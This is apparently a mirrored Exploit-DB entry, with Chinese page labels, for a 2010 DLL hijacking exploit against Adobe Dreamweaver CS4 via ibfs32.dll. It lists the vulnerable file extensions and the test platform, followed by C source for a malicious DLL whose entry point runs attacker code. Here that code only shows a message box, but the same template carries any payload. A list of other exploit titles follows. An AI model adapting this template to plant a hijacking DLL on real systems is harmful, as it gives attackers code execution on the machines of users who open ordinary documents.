Adobe Dreamweaver CS4 – ‘ibfs32.dll’ DLL Hijacking

Exploit Database
11 阅读

作者： Glafkos Charalambous

日期： 2010-08-24
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/14735/

/* 
Exploit Title: Adobe Dreamweaver CS4 DLL Hijacking Exploit (ibfs32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: 10.0 Build 4117
Tested on: Windows 7 Ultimate x86
Vulnerable extensions: .asp .asa. aspx .php .php5 .cfm .tpl .asr .jsp (etc)
Greetz: Astalavista, OffSEC, Exploit-DB
*/

#include <windows.h>
#define DllExport __declspec (dllexport)

BOOL WINAPIDllMain (
HANDLEhinstDLL,
DWORD fdwReason,
LPVOIDlpvReserved)
{
dll_hijack();
return 0;
}

int dll_hijack()
{
MessageBox(0, "Dreamweaver DLL Hijacking!", "DLL Message", MB_OK);
return 0;
}

last Exploits
Adobe Dreamweaver CS4 – ‘ibfs32.dll’ DLL Hijacking的更多信息

Kingdia CD Extractor 3.0.2 – Buffer Overflow (SEH)：
VisiWave – ‘.VWR’ File Parsing Trusted Pointer (Metasploit)：
AoA Mp4 Converter 4.1.0 – ActiveX Stack Overflow：
Enlightenment v0.25.3 – Privilege escalation：
xorg-x11-server < 1.20.3 - Local Privilege Escalation：
VirtualBox 5.1.22 – Windows Process DLL UNC Path Signature Bypass Privilege Escalation：
Mini-stream Ripper 3.1.2.1 – Local Buffer Overflow (DEP Bypass)：
PackageKit < 1.1.13 - File Existence Disclosure：